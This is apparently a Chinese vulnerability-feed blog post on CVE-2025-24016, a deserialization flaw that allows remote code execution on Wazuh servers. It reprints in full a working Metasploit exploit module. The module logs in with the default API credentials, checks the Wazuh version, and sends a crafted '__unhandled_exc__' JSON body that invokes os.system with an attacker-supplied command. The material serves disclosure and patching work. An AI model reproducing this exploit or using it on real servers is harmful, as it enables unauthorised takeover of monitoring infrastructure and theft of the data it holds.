Wazuh server remote code execution caused by an unsafe deserialization vulnerability

漏洞信息

漏洞名称: Wazuh server remote code execution caused by an unsafe deserialization vulnerability

漏洞编号:

  • CVE: CVE-2025-24016

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Wazuh是一个免费开源的威胁预防、检测和响应平台,广泛用于企业级安全监控。该平台因其强大的功能和灵活性,在全球范围内被广泛部署和使用。此次发现的漏洞存在于Wazuh服务器的分布式API参数处理过程中,具体为在framework/wazuh/core/cluster/common.py中的as_wazuh_object函数对序列化的JSON数据进行反序列化时,未能正确处理输入验证,导致存在不安全的反序列化漏洞。攻击者可以通过构造特定的恶意数据,利用__unhandled_exc__异常来执行任意Python代码。此漏洞的利用条件相对宽松,任何拥有API访问权限的用户(包括被入侵的仪表板或集群中的Wazuh服务器)或在特定配置下甚至是被入侵的代理,都可能触发此漏洞。由于漏洞允许远程代码执行,攻击者可以完全控制受影响的系统,导致严重的安全风险,包括数据泄露、服务中断等。

产品厂商: Wazuh

产品名称: Wazuh

影响版本: 4.4.0 <= version < 4.9.1

来源: https://github.com/rapid7/metasploit-framework/blob/639315452c843e5ae7f622fcf476200d322a716d/modules%2Fexploits%2Flinux%2Fhttp%2Fwazuh_auth_rce_cve_2025_24016.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wazuh server remote code execution caused by an unsafe deserialization vulnerability.',
        'Description' => %q{
          Wazuh is a free and open source platform used for threat prevention, detection, and response.
          Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability
          allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized
          as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).
          If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can
          forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
          The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh
          servers in the cluster) or, in certain configurations, even by a compromised agent.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module & default password weakness
          'DanielFi https://github.com/DanielFi', # Discovery
        ],
        'References' => [
          ['CVE', '2025-24016'],
          ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
          ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Privileged' => false,
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'Unix/Linux Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-02-10',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 55000
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Path to the wazuh manager', '/']),
      OptString.new('API_USER', [true, 'Wazuh API user', 'wazuh-wui']),
      OptString.new('API_PWD', [true, 'Wazuh API password', 'MyS3cr37P450r.*-'])
    ])
  end

  # get Wazuh API token
  # return token if API login is successful else nil
  def get_api_token
    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate'),
      'headers' => {
        'Authorization' => basic_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('token')

    res_json = res.get_json_document
    res_json['data']['token'] unless res_json.blank?
  end

  # get the Wazuh version
  # return version if successful else nil
  def get_wazuh_version(api_token)
    api_auth = "Bearer #{api_token}"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Authorization' => api_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('api_version')

    res_json = res.get_json_document
    res_json['data']['api_version'] unless res_json.blank?
  end

  # CVE-2025-24016: Command Injection leading to RCE via unsafe deserialization vulnerability
  def execute_command(cmd, _opts = {})
    # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
    post_data = {
      __unhandled_exc__:
      {
        __class__: 'os.system',
        __args__: [ cmd.to_s ]
      }
    }.to_json

    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate', 'run_as'),
      'ctype' => 'application/json',
      'headers' => {
        'Authorization' => basic_auth.to_s
      },
      'data' => post_data.to_s
    })
  end

  def check
    # check Wazuh API access with the API credentials
    api_token = get_api_token
    return CheckCode::Unknown('Can not access the Wazuh API with provided credentials.') if api_token.nil?

    version = get_wazuh_version(api_token)
    return CheckCode::Detected('Can not determine the Wazuh version.') if version.nil?

    version = Rex::Version.new(version)
    unless version >= Rex::Version.new('4.4.0') && version < Rex::Version.new('4.9.1')
      return CheckCode::Safe("Wazuh version #{version}")
    end

    CheckCode::Appears("Wazuh version #{version}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    execute_command(payload.encoded)
  end
end


Github Poc
#反序列化 #rapid7/metasploit-framework:github issues
Wazuh server remote code execution caused by an unsafe deserialization vulnerability
http://example.com/2025/07/16/github_2643827425/
作者
lianccc
发布于
2025年7月16日
许可协议